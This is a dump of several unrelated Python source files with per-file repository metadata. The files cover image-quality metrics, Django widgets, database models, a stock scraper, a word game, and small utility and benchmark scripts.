        self.parse_tensor = self.sess.graph.get_tensor_by_name('parse:0')

    def predict(self, img):
        '''
        img is a human image array with shape (any,any,3)
        return a list, [pose, parse]
        '''
        # Mean-subtraction matches the normalization used at training time.
        ret = self.sess.run([self.pose_tensor, self.parse_tensor],
                            feed_dict={self.img_tensor: img - JPP.IMG_MEAN})
        return ret
36.439024
113
0.672691
213
1,494
4.549296
0.464789
0.033024
0.04644
0.055728
0.092879
0.092879
0.092879
0
0
0
0
0.034423
0.222222
1,494
41
114
36.439024
0.799484
0.168675
0
0
0
0
0.018288
0
0
0
0
0
0
1
0.076923
false
0
0.346154
0
0.538462
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
00c7a204bdfb47a3865e131d3affcf1f44535d58
1,049
py
Python
tools/similarity.py
bruinxiong/gnerf
5a6f1141a5b87dac66a755c7238263da85934d72
[ "MIT" ]
137
2021-07-25T03:48:07.000Z
2022-03-31T17:52:28.000Z
tools/similarity.py
bruinxiong/gnerf
5a6f1141a5b87dac66a755c7238263da85934d72
[ "MIT" ]
4
2021-09-08T03:21:19.000Z
2022-03-30T07:53:31.000Z
tools/similarity.py
bruinxiong/gnerf
5a6f1141a5b87dac66a755c7238263da85934d72
[ "MIT" ]
10
2021-11-16T11:31:55.000Z
2022-03-23T00:59:35.000Z
import torch
from kornia.losses import ssim as dssim
from lpips_pytorch import LPIPS

# Shared LPIPS network (AlexNet backbone, v0.1 weights), constructed once at
# import time and kept in eval mode.
lpips_fn = LPIPS(net_type='alex', version='0.1')
lpips_fn.eval()


def mse(image_pred, image_gt, valid_mask=None, reduction='mean'):
    """Squared error between prediction and ground truth.

    Returns the scalar mean when reduction == 'mean'; otherwise the
    per-element error map, optionally restricted to valid_mask.
    """
    sq_err = (image_pred - image_gt) ** 2
    if valid_mask is not None:
        sq_err = sq_err[valid_mask]
    if reduction != 'mean':
        return sq_err
    return torch.mean(sq_err)


def psnr(image_pred, image_gt, valid_mask=None, reduction='mean'):
    """PSNR between two images given in [-1, 1] (remapped to [0, 1] first)."""
    pred01 = image_pred / 2 + 0.5
    gt01 = image_gt / 2 + 0.5
    return -10 * torch.log10(mse(pred01, gt01, valid_mask, reduction))


def ssim(image_pred, image_gt, reduction='mean'):
    """SSIM between two images given in [-1, 1]."""
    pred01 = image_pred / 2 + 0.5
    gt01 = image_gt / 2 + 0.5
    dissimilarity = dssim(pred01, gt01, 3, reduction)  # dissimilarity in [0, 1]
    return 1 - 2 * dissimilarity  # in [-1, 1]


def lpips(image_pred, image_gt, device='cpu'):
    """Mean LPIPS distance between two image batches on the given device."""
    lpips_fn.to(device)
    with torch.no_grad():
        distance = lpips_fn(image_pred, image_gt)
    return distance.mean().item()
28.351351
81
0.672069
167
1,049
3.982036
0.287425
0.162406
0.210526
0.192481
0.306767
0.306767
0.306767
0.26015
0.26015
0.153383
0
0.031175
0.204957
1,049
36
82
29.138889
0.766187
0.032412
0
0.153846
0
0
0.025692
0
0
0
0
0
0
1
0.153846
false
0
0.115385
0
0.461538
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
00d5c06169e029f19ff54dc53dda05af8a89e021
917
py
Python
formly/forms/widgets.py
coloradocarlos/formly
88ee816835687c7ab8c80fe78f3e32c9e1761a33
[ "BSD-3-Clause" ]
34
2015-02-08T15:07:44.000Z
2021-07-04T05:05:37.000Z
formly/forms/widgets.py
coloradocarlos/formly
88ee816835687c7ab8c80fe78f3e32c9e1761a33
[ "BSD-3-Clause" ]
30
2015-01-21T15:39:00.000Z
2021-07-04T05:12:03.000Z
formly/forms/widgets.py
coloradocarlos/formly
88ee816835687c7ab8c80fe78f3e32c9e1761a33
[ "BSD-3-Clause" ]
10
2015-04-22T13:13:27.000Z
2021-06-08T19:53:36.000Z
from django.forms import TextInput
from django.forms.widgets import MultiWidget, RadioSelect
from django.template.loader import render_to_string


class MultiTextWidget(MultiWidget):
    """A MultiWidget composed of a fixed number of plain text inputs."""

    def __init__(self, widgets_length, **kwargs):
        # One TextInput per requested slot, handed to MultiWidget via kwargs.
        text_inputs = [TextInput() for _ in range(widgets_length)]
        kwargs.update({"widgets": text_inputs})
        super(MultiTextWidget, self).__init__(**kwargs)

    def decompress(self, value):
        # A missing value decomposes into an empty list of sub-values.
        if value is None:
            return []
        return value

    def format_output(self, rendered_widgets):
        # Render all sub-widgets through a single template.
        context = {
            "inputs": rendered_widgets
        }
        return render_to_string("formly/run/_multiple_input.html", context=context)


class LikertSelect(RadioSelect):
    """
    This class differentiates Likert-scale radio selects from "normal"
    radio selects for presentation purposes.
    """
    pass


class RatingSelect(RadioSelect):
    pass
26.970588
62
0.676118
98
917
6.122449
0.561224
0.05
0.05
0
0
0
0
0
0
0
0
0
0.237732
917
33
63
27.787879
0.858369
0.116685
0
0.095238
0
0
0.055696
0.039241
0
0
0
0
0
1
0.142857
false
0.095238
0.142857
0.095238
0.52381
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
00e1a3dc3b3a1c20f6037788df47098e679b8083
447
py
Python
models/blog.py
AbhishekPednekar84/personal-portfolio
b7aa797e52399bc002efee21e78195edc110a446
[ "MIT" ]
2
2020-01-15T07:18:11.000Z
2020-01-29T16:36:20.000Z
models/blog.py
AbhishekPednekar84/personal-portfolio
b7aa797e52399bc002efee21e78195edc110a446
[ "MIT" ]
2
2019-11-19T08:50:11.000Z
2019-12-29T07:15:59.000Z
models/blog.py
AbhishekPednekar84/personal-portfolio
b7aa797e52399bc002efee21e78195edc110a446
[ "MIT" ]
null
null
null
from extensions import db
from sqlalchemy.dialects.postgresql import TSVECTOR


class Blog(db.Model):
    """SQLAlchemy model for one blog-post entry in the "blog" table."""
    __tablename__ = "blog"

    # Surrogate integer primary key.
    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(100))
    url = db.Column(db.String(100))
    description = db.Column(db.String(1000))
    # PostgreSQL full-text-search vector over the description.
    # NOTE(review): how this column is populated (trigger vs. application
    # code) is not visible here -- confirm before relying on it.
    description_token = db.Column(TSVECTOR)

    def __repr__(self):
        return f"Blog({self.id}, {self.title}, {self.url}, {self.description})"
27.9375
79
0.689038
61
447
4.885246
0.491803
0.134228
0.134228
0.161074
0.127517
0
0
0
0
0
0
0.026954
0.170022
447
15
80
29.8
0.77628
0
0
0
0
0.090909
0.145414
0
0
0
0
0
0
1
0.090909
false
0
0.181818
0.090909
1
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
da9a059c634fcea4a96216e4d1ee920ceb4dd1fd
1,581
py
Python
INBa/2015/SOSNOVY_M_S/task_9_26.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
INBa/2015/SOSNOVY_M_S/task_9_26.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
INBa/2015/SOSNOVY_M_S/task_9_26.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
# Task 9. Variant 26
# Create a game in which the computer picks a word and the player must guess
# it.  The computer tells the player how many letters the word has and gives
# five attempts to ask whether some letter occurs in the word, answering only
# "yes"/"no".  The player must then try to guess the whole word.
# Sosnovy M.S.
# 01.02.2016
import random

slova = ("нужен", "автомат", "программирование", "очень")
slovo = str(random.choice(slova))
bykv = len(slovo)
print("Я загадл слово в нем ", str(bykv), " букв. У Вас есть 5 попыток узнать есть л в этом слове какая-либо буква.")

# The original repeated this question/answer block five times verbatim; a
# loop removes the duplication without changing the interaction.
for _ in range(5):
    print("Какую букву вы загадываете?")
    bykva = str(input())
    if bykva in slovo:
        print("Ваша буква встречаеться")
    else:
        print("Ваша буква не встречаеться")

print("Ваш ответ:")
otvet = str(input())
# Bug fix: the original looped on `otvet != slovo` without ever reading a new
# answer, so one wrong guess printed the retry message forever.  Re-prompt and
# re-read inside the loop until the word is guessed.
while otvet != slovo:
    print("Попробуйте еще раз...")
    print("Ваш ответ:")
    otvet = str(input())
print("Поздравляю Вы победили!!! WIN")
input("Нажмите ENTER для продолжения")
32.265306
310
0.726755
233
1,581
4.93133
0.412017
0.078329
0.121845
0.073977
0.496084
0.496084
0.496084
0.496084
0.496084
0.496084
0
0.008909
0.148008
1,581
49
311
32.265306
0.844098
0.223909
0
0.714286
0
0
0.486509
0
0
0
0
0
0
1
0
false
0
0.02381
0
0.02381
0.452381
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
2
daaf40a6e0a5cb830dd91fcd7e3b46efbcad6d4e
13,714
py
Python
common.py
hwase0ng/klseScrappers
367ac86b603fad35c4983b04f9e72d4694d4bc31
[ "MIT" ]
3
2020-05-27T06:01:12.000Z
2021-11-29T20:56:06.000Z
common.py
hwase0ng/klseScrappers
367ac86b603fad35c4983b04f9e72d4694d4bc31
[ "MIT" ]
3
2020-03-08T14:45:16.000Z
2021-12-13T19:47:14.000Z
common.py
hwase0ng/klseScrappers
367ac86b603fad35c4983b04f9e72d4694d4bc31
[ "MIT" ]
null
null
null
""" Created on Apr 27, 2018 @author: hwase0ng """ from BeautifulSoup import BeautifulSoup from utils.dateutils import getToday, getDayOffset, generate_dates from utils.fileutils import wc_line_count from curses.ascii import isprint import csv import json import requests import sys import settings as S import socket import os from utils.fileutils import cd class FifoList: def __init__(self): self.data = [] def append(self, data): self.data.append(data) def pop(self): return self.data.pop(0) class FifoDict: def __init__(self): self.data = {} self.nextin = 0 self.nextout = 0 def append(self, data): self.nextin += 1 self.data[self.nextin] = data def pop(self): self.nextout += 1 result = self.data[self.nextout] del self.data[self.nextout] if S.DBG_ALL: print 'out:', self.nextout, result return result def loadSetting(c): chromedir = c["main"]["CHROME_DIR"] if len(chromedir) > 0: S.CHROME_DIR = chromedir S.BKUP_DIR = c["main"]["BKUP_DIR"] S.MT4_DIR = c["main"]["MT4_DIR"] try: # Allows DATA_DIR to be overwritten here datadir = c["main"]["DATA_DIR"] if len(datadir) > 0 and (datadir.endswith('/') or datadir.endswith('\\')): S.DATA_DIR = datadir S.DATA_DIR_W = c["main"]["DATA_DIR_W"] except Exception: pass S.I3_UID = c["i3"]["UID"] S.I3_PWD = c["i3"]["PWD"] S.I3_KLSE_URL = c["i3"]["KLSE_URL"] S.I3_HOLDINGS = c["i3"]["HOLDINGS"] S.I3_WATCHLIST = c["i3"]["WATCHLIST"] S.I3_MVP = c["i3"]["MVP"] S.I3_MOMENTUM = c["i3"]["MOMENTUM"] S.I3_DIVIDEND = c["i3"]["DIVIDEND"] S.I3_PORTFOLIO_URL = S.I3_KLSE_URL + c["i3"]["PORTFOLIO_URL"] def loadCfg(datadir): try: # Refers backup drive instead of DATA_DIR which is in network share with open(datadir + 'config.json') as json_data_file: cfg = json.load(json_data_file) loadSetting(cfg) return cfg except EnvironmentError: print "Missing config.json file:", datadir sys.exit(1) def loadRelatedMap(): idmap = {} others = S.KLSE_RELATED.split(',') for item in others: other = item.split('.') idmap[other[0]] = other[1] return idmap def loadMap(klsemap, 
sep=","): ID_MAPPING = loadRelatedMap() try: with open(klsemap) as idmap: for line in idmap: name, var = line.partition(sep)[::2] if sep in var: # input: "3A,0012,THREE-A RESOURCES BHD,507" # drops ",THREE-A RESOURCES BHD,507" var, dummy = var.partition(sep)[::2] ID_MAPPING[name.strip()] = var.strip() if S.DBG_ALL: print dict(ID_MAPPING.items()[0:3]) except EnvironmentError: print "Invalid map file:", klsemap except KeyError: print "loadIdMap KeyError:", name return ID_MAPPING def loadKlseRelated(): stocklist = {} counters = S.KLSE_RELATED.split(',') for counter in counters: counter = counter.split('.') stocklist[counter[0]] = counter[1] return stocklist def loadKlseCounters(infile): stocklist = {} with open(infile) as f: reader = csv.reader(f) slist = list(reader) if S.DBG_ALL: print slist[:3] for counter in slist[:]: if S.DBG_ALL: print "\t", counter[0] stocklist[counter[0]] = counter[1] return stocklist def formStocklist(stocks, infile): stocklist = {} if "," in stocks: stocks = stocks.split(",") else: stocks = [stocks] imap = loadMap(infile, ',') for shortname in stocks: # stock_code = getStockCode(shortname, infile) try: if "." in shortname: # KLSE related from settings.py names = shortname.split('.') stocklist[names[0]] = names[1] else: stock_code = imap[shortname] stocklist[shortname] = stock_code except KeyError: print "Applied hack for missing entry:", shortname # Hack to bypass restriction on KLSE counters stocklist[shortname] = "0" return stocklist def appendCsv(rtn_code, OUTPUT_FILE): if rtn_code != 0: return TMP_FILE = OUTPUT_FILE + 'tmp' f = open(OUTPUT_FILE, "ab+") ftmp = open(TMP_FILE, "rb") f.write(ftmp.read()) f.flush() f.close() ftmp.close() def getDataDir(datadir, dirname="klseScrapers"): if datadir.startswith('/') or datadir.startswith('\\'): # Using absolute path; e.g. 
/d/klse/data return datadir # Using relative path such as ./data cwd = os.getcwd().split(os.sep) ind = cwd.index(dirname) cwdlen = len(cwd) if ind == cwdlen - 1: return os.path.join(".", datadir) elif ind == cwdlen - 2: return os.path.join("..", datadir) return os.path.join("..", "..", datadir) def getI3Dir(): cwd = os.getcwd().split(os.sep) cwdlen = len(cwd) if cwd[cwdlen - 1] == 'klseScrapers': return 'scrapers/i3investor/' elif cwd[cwdlen - 1] == 'i3investor': return './' return '' def isOpen(ip, port): s = socket.socket(socket. AF_INET, socket.SOCK_STREAM) s.settimeout(5) try: s.connect((ip, port)) s.shutdown(2) return True except Exception: return False def getMt4StartDate(): mt4Start = getDayOffset(getToday('%Y-%m-%d'), S.MT4_DAYS * -1) # Fixed to 1st Jan of year mt4Start = mt4Start[:4] + "-01-01" return mt4Start def retrieveCounters(clist): if clist is None or not len(clist): return '' valids = "dhkmwM" if not any((c in clist) for c in valids): print clist, "is not one of", valids print "defaulting to m for MVP" clist = "m" counters = [] if 'd' in clist: counters += S.I3_DIVIDEND.split(',') if 'h' in clist: counters += S.I3_HOLDINGS.split(',') if 'k' in clist: counters += S.KLSE_RELATED.split(',') if 'm' in clist: counters += S.I3_MVP.split(',') if 'w' in clist: counters += S.I3_WATCHLIST.split(',') if 'M' in clist: counters += S.I3_MOMENTUM.split(',') return ",".join(counters) # obsolete, use retrieveCounters instead def getCounters(counterlist, klse, pf, wl, verbose=True): counters = '' if klse: slist = loadKlseRelated() clist = list(slist.keys()) counters = ','.join(clist) if pf: if len(counters) > 0: counters += ',' + S.I3_HOLDINGS else: counters = S.I3_HOLDINGS if wl and len(S.I3_WATCHLIST) > 0: if len(counters) > 0: counters += ',' + S.I3_WATCHLIST else: counters = S.I3_WATCHLIST if len(counterlist) > 0: if len(counters) > 0: counters += ',' + ','.join(counterlist) else: counters = ','.join(counterlist) if len(counters) > 0: return counters.upper() if 
verbose: print " INF:Counter is empty" return counters def getSkipRows(csvfl, skipdays=S.MVP_DAYS): row_count = wc_line_count(csvfl) if row_count < 0: return -1, -1 # File not found if row_count < skipdays: skiprow = 0 else: skiprow = row_count - skipdays return skiprow, row_count def match_approximate(a, b, approx): c, d = [], [] bEnd = False bfifo = FifoDict() for i in b: bfifo.append(i) y = 0 for x in a: if bEnd: continue while True: if y == 0 or x - y > approx: try: y = bfifo.pop() except KeyError: bEnd = True break if abs(x - y) <= approx: c.append(x) d.append(y) break if y > x: break return [c, d] # Credit to the following implementation goes to Matt Messersmith: # https://stackoverflow.com/questions/53022670/how-to-compare-2-sorted-numeric-lists-in-python-where-each-corresponding-element def match_approximate2(a, b, approx, invert=False, vector=None, cmpv=None): a_ind, b_ind = 0, 0 resulta, resultb = [], [] while a_ind < len(a) and b_ind < len(b): aItem, bItem = a[a_ind], b[b_ind] if abs(aItem - bItem) <= approx: if not invert: resulta.append(aItem) resultb.append(bItem) else: yrange = max(vector) - min(vector) ydist = abs(vector[aItem] - vector[bItem]) if ydist > yrange / 10: resulta.append(aItem) resultb.append(bItem) else: if S.DBG_ALL: print "Invert filters:", cmpv, aItem, bItem, \ vector[aItem], vector[bItem], yrange, ydist a_ind += 1 b_ind += 1 continue if aItem < bItem: if invert: resulta.append(aItem) a_ind += 1 else: if invert: resultb.append(bItem) b_ind += 1 ''' def match_last_element(a, a_ind, last_elt_of_b, resulta, resultb): while a_ind != len(a): if abs(a[a_ind] - last_elt_of_b) <= approx: resulta.append(a[a_ind]) resultb.append(b[b_ind]) a_ind += 1 else: break if a_ind != len(a): match_last_element(a, a_ind, b[-1], resulta, resultb) else: match_last_element(b, b_ind, a[-1], resulta, resultb) ''' if invert: while a_ind != len(a): resulta.append(a[a_ind]) a_ind += 1 while b_ind != len(b): resulta.append(b[b_ind]) b_ind += 1 return [resulta, 
resultb] def combineList(listoflists): xpositive, xnegative, ypositive, ynegative = \ listoflists[0], listoflists[1], listoflists[2], listoflists[3] # 0=XP, 1=XN, 2=YP, 3=YN datelist, ylist = sorted(xpositive + xnegative), [] for dt in datelist: try: pos = xpositive.index(dt) ylist.append(ypositive[pos]) except ValueError: pos = xnegative.index(dt) ylist.append(ynegative[pos]) return ylist def matchdates(l1, l2, approx=31): swapP, matchdict = False, {} if l1[-1] < l2[-1]: swapP = True if not swapP: list1, list2 = l1, l2 else: # TASCO 2012-06-08 list1, list2 = l2, l1 for i, val in enumerate(list1): matchtolerance = 0 try: j = list2.index(val) except ValueError: j = -1 if approx: dtstart = getDayOffset(val, approx * -1) dtend = getDayOffset(val, approx) for newval in list2: if newval < dtstart: continue if newval > dtend: break matchtolerance = 1 j = list2.index(newval) break matchval = 0 if j < 0 else j - len(list2) matchdict[i - len(list1)] = [matchval, matchtolerance, val] return swapP, matchdict def printable(pstr): return ''.join(char for char in pstr if isprint(char)) def connect_url(url): global soup try: page = requests.get(url, headers=S.HEADERS) assert(page.status_code == 200) html = page.content soup = BeautifulSoup(html) except Exception as e: print(e) soup = '' return soup if __name__ == '__main__': ''' line = "3A,0012,THREE-A RESOURCES BHD,507" name, var = line.partition(',')[::2] if ',' in var: var, dummy = var.partition(',')[::2] print name print var print getDataDir('data/') with cd('scrapers'): print getDataDir('data/') with cd('scrapers/i3'): print getDataDir('data/') ''' ''' lists = [['2018-03-31', '2018-04-05'], ['2018-01-05', '2018-04-01'], [1.2, 1.5], [1.1, 2.0]] print combineList(lists) lists = [['2018-03-01', '2018-03-05', '2018-04-30'], ['2018-01-05', '2018-04-01'], [1.2, 1.5, 1.7], [1.1, 2.0]] print combineList(lists) lists = [['2018-03-31', '2018-04-05'], ['2018-04-01'], [1.2, 1.5], [2.0]] print combineList(lists) ''' mdatesp = 
['2013-03-31', '2013-10-31', '2013-12-31', '2014-03-03'] pdatesp = ['2013-01-31', '2013-03-31', '2013-06-30', '2013-09-30', '2013-12-31'] mdatesn = ['2013-07-31', '2013-11-30', '2014-02-28'] pdatesn = ['2013-02-28', '2013-04-30', '2013-07-31', '2013-11-30', '2014-02-28'] print matchdates(mdatesn, pdatesn) m = matchdates(mdatesp, pdatesp) print m for k, v in enumerate(sorted(m, reverse=True)): print k, v, m[v]
29.240938
130
0.521948
1,652
13,714
4.250605
0.224576
0.008545
0.014099
0.013671
0.176445
0.11464
0.08687
0.048704
0.022928
0.016092
0
0.049882
0.350955
13,714
468
131
29.303419
0.739018
0.050095
0
0.22792
1
0
0.055925
0
0.002849
0
0
0
0.002849
0
null
null
0.002849
0.034188
null
null
0.054131
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
dabb68b6fb48686276a922ea58be91f96ae78543
4,076
py
Python
src/solutions/common/models/group_purchase.py
goubertbrent/oca-backend
b9f59cc02568aecb55d4b54aec05245790ea25fd
[ "Apache-2.0" ]
null
null
null
src/solutions/common/models/group_purchase.py
goubertbrent/oca-backend
b9f59cc02568aecb55d4b54aec05245790ea25fd
[ "Apache-2.0" ]
null
null
null
src/solutions/common/models/group_purchase.py
goubertbrent/oca-backend
b9f59cc02568aecb55d4b54aec05245790ea25fd
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@

from rogerthat.dal import parent_key, parent_key_unsafe
from rogerthat.rpc import users
from rogerthat.utils.service import get_identity_from_service_identity_user, \
    get_service_user_from_service_identity_user

from google.appengine.ext import db

from solutions.common.models.properties import SolutionUserProperty
from solutions.common.utils import create_service_identity_user_wo_default


class SolutionGroupPurchaseSettings(db.Model):
    """Per-service settings for the group-purchase solution module.

    Stored as a child of the (service_user, solution) parent key; see
    create_key().
    """
    # Whether the group-purchase feature is shown at all.
    visible = db.BooleanProperty(indexed=False, default=True)
    # Hash of the branding used to render the group-purchase pages.
    branding_hash = db.StringProperty(indexed=False)

    @property
    def service_user(self):
        # The parent key's name is the service user's email.
        return users.User(self.parent_key().name())

    @staticmethod
    def create_key(service_user, solution):
        """Datastore key for the single settings entity of this service."""
        return db.Key.from_path(SolutionGroupPurchaseSettings.kind(), service_user.email(),
                                parent=parent_key(service_user, solution))


class SolutionGroupPurchase(db.Model):
    """One group purchase (deal) offered by a service identity.

    Ancestor is the (service_identity_user, solution) parent key; subscription
    entities are stored as children of this entity (ancestor queries below).
    """
    title = db.StringProperty(indexed=False)
    description = db.TextProperty(indexed=False)
    picture = db.BlobProperty(indexed=False)
    # Incremented whenever picture changes (cache busting, presumably --
    # the increment happens outside this file).
    picture_version = db.IntegerProperty(indexed=False, default=0)
    # Total number of units on offer for this deal.
    units = db.IntegerProperty(indexed=False)
    unit_description = db.TextProperty(indexed=False)
    unit_price = db.IntegerProperty(indexed=False)  # in euro cents
    # Minimum / maximum units a single person may subscribe to.
    min_units_pp = db.IntegerProperty(indexed=False)
    max_units_pp = db.IntegerProperty(indexed=False)
    time_from = db.IntegerProperty()  # epoch
    time_until = db.IntegerProperty()  # epoch
    # Soft-delete flag; list() filters deleted entities out.
    deleted = db.BooleanProperty(default=False)

    @property
    def unit_price_in_euro(self):
        # Format euro cents as a euro amount with 2 decimals.
        return u'{:20,.2f}'.format(self.unit_price / 100.0).strip()

    @property
    def id(self):
        return self.key().id()

    @property
    def service_identity_user(self):
        # The parent key's name encodes the service identity user.
        return users.User(self.parent_key().name())

    @property
    def service_user(self):
        return get_service_user_from_service_identity_user(self.service_identity_user)

    @property
    def service_identity(self):
        return get_identity_from_service_identity_user(self.service_identity_user)

    @property
    def subscriptions(self):
        # All subscriptions stored under this group purchase.
        return SolutionGroupPurchaseSubscription.all().ancestor(self)

    def subscriptions_for_user(self, app_user):
        """Subscriptions of one app user for this group purchase."""
        return SolutionGroupPurchaseSubscription.all().ancestor(self).filter('app_user =', app_user)

    @property
    def units_available(self):
        # Remaining units = total minus the sum of all subscribed units.
        available_units = self.units
        for e in self.subscriptions:
            available_units -= e.units
        return available_units

    @staticmethod
    def list(service_user, service_identity, solution):
        """All non-deleted group purchases of a service identity."""
        service_identity_user = create_service_identity_user_wo_default(service_user, service_identity)
        return SolutionGroupPurchase.all().ancestor(parent_key_unsafe(service_identity_user, solution)).filter('deleted', False)


class SolutionGroupPurchaseSubscription(db.Model):
    """One user's subscription to a group purchase (child entity)."""
    sender = SolutionUserProperty(indexed=False)  # app
    name = db.StringProperty(indexed=False)  # cms
    units = db.IntegerProperty(indexed=False)
    # Subscription creation time (epoch).
    timestamp = db.IntegerProperty(indexed=False)
    # Indexed so subscriptions_for_user() can filter on it.
    app_user = db.UserProperty(indexed=True)

    @property
    def id(self):
        return self.key().id()

    @property
    def solution_group_purchase_key(self):
        return self.parent_key()

    @property
    def solution_group_purchase(self):
        return SolutionGroupPurchase.get(self.solution_group_purchase_key)
36.392857
128
0.73945
501
4,076
5.824351
0.313373
0.061686
0.071624
0.069568
0.297807
0.193968
0.113434
0.095956
0.095956
0.06854
0
0.005631
0.172228
4,076
111
129
36.720721
0.859218
0.157017
0
0.306667
0
0
0.007616
0
0
0
0
0
0
1
0.186667
false
0
0.08
0.16
0.746667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
2
dabfd08ab527b85660d4d9570e35a8695162beeb
131
py
Python
bench/test_get.py
eabrouwer3/aiotoolz
10790c9c5a8413502d8f35ce157966290492dbab
[ "BSD-3-Clause" ]
null
null
null
bench/test_get.py
eabrouwer3/aiotoolz
10790c9c5a8413502d8f35ce157966290492dbab
[ "BSD-3-Clause" ]
null
null
null
bench/test_get.py
eabrouwer3/aiotoolz
10790c9c5a8413502d8f35ce157966290492dbab
[ "BSD-3-Clause" ]
null
null
null
from aiotoolz import get tuples = [(1, 2, 3) for i in range(100000)] def test_get(): for tup in tuples: get(1, tup)
14.555556
43
0.603053
23
131
3.391304
0.695652
0
0
0
0
0
0
0
0
0
0
0.105263
0.274809
131
8
44
16.375
0.715789
0
0
0
0
0
0
0
0
0
0
0
0
1
0.2
false
0
0.2
0
0.4
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
dac361a95a6b2abc8f3940126e5652a22be4255b
788
py
Python
xrpl/utils/str_conversions.py
antonyggvzvmnxxcx/xrpl-py
fda7ce2a28807374b40324478e42e17d97a063d7
[ "ISC" ]
null
null
null
xrpl/utils/str_conversions.py
antonyggvzvmnxxcx/xrpl-py
fda7ce2a28807374b40324478e42e17d97a063d7
[ "ISC" ]
2
2022-02-23T22:57:46.000Z
2022-02-24T11:41:49.000Z
xrpl/utils/str_conversions.py
antonyggvzvmnxxcx/xrpl-py
fda7ce2a28807374b40324478e42e17d97a063d7
[ "ISC" ]
1
2022-02-21T07:36:36.000Z
2022-02-21T07:36:36.000Z
"""Various useful string conversions utilities for XRPL.""" def str_to_hex(input: str) -> str: """ Convert a UTF-8-encoded string into hexadecimal encoding. XRPL uses hex strings as inputs in fields like `domain` in the `AccountSet` transaction. Args: input: UTF-8-encoded string to convert Returns: Input encoded as a hex string. """ return input.encode("utf-8").hex() def hex_to_str(input: str) -> str: """ Convert a hex string into a human-readable string. XRPL uses hex strings as inputs in fields like `domain` in the `AccountSet` transaction. Args: input: hex-encoded string to convert Returns: Input encoded as a human-readable string. """ return bytes.fromhex(input).decode()
24.625
61
0.656091
108
788
4.75
0.37037
0.023392
0.042885
0.070175
0.553606
0.479532
0.479532
0.479532
0.479532
0.307992
0
0.005085
0.251269
788
31
62
25.419355
0.864407
0.68401
0
0
0
0
0.030303
0
0
0
0
0
0
1
0.5
false
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
dacec6192e4e79e1e83802fb0e5ede942684c020
335
py
Python
sshr/clients/admin.py
zhengxiaowai/sshm
af83e9c8dfc805747d978b8e9031bf57f057bebd
[ "MIT" ]
null
null
null
sshr/clients/admin.py
zhengxiaowai/sshm
af83e9c8dfc805747d978b8e9031bf57f057bebd
[ "MIT" ]
null
null
null
sshr/clients/admin.py
zhengxiaowai/sshm
af83e9c8dfc805747d978b8e9031bf57f057bebd
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- from core import SSHRAdmin from ._dropbox import DropboxClient from ._qiniu import QiniuClient from ._webdav import WebdavClient sshr_admin = SSHRAdmin() sshr_admin.register('dropbox', DropboxClient) sshr_admin.register('qiniu', QiniuClient) sshr_admin.register('webdav', WebdavClient)
23.928571
45
0.78209
41
335
6.219512
0.487805
0.141176
0.2
0
0
0
0
0
0
0
0
0.003333
0.104478
335
13
46
25.769231
0.846667
0.125373
0
0
0
0
0.061856
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
dad1393dffc0b140629b9522d25813d0ecd5bc80
78
py
Python
pc.py
MaNongJiaLe/DaYuHaiTang
3063de6e390dfb2d74ae3ae6a30e10f6dc31d16f
[ "Apache-2.0" ]
null
null
null
pc.py
MaNongJiaLe/DaYuHaiTang
3063de6e390dfb2d74ae3ae6a30e10f6dc31d16f
[ "Apache-2.0" ]
null
null
null
pc.py
MaNongJiaLe/DaYuHaiTang
3063de6e390dfb2d74ae3ae6a30e10f6dc31d16f
[ "Apache-2.0" ]
null
null
null
print('nice' in 'nice to meet you') a=1000000 b=1000000 c=a+b print(c)
6
35
0.628205
16
78
3.0625
0.625
0
0
0
0
0
0
0
0
0
0
0.229508
0.217949
78
12
36
6.5
0.57377
0
0
0
0
0
0.27027
0
0
0
0
0
0
1
0
false
0
0
0
0
0.4
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
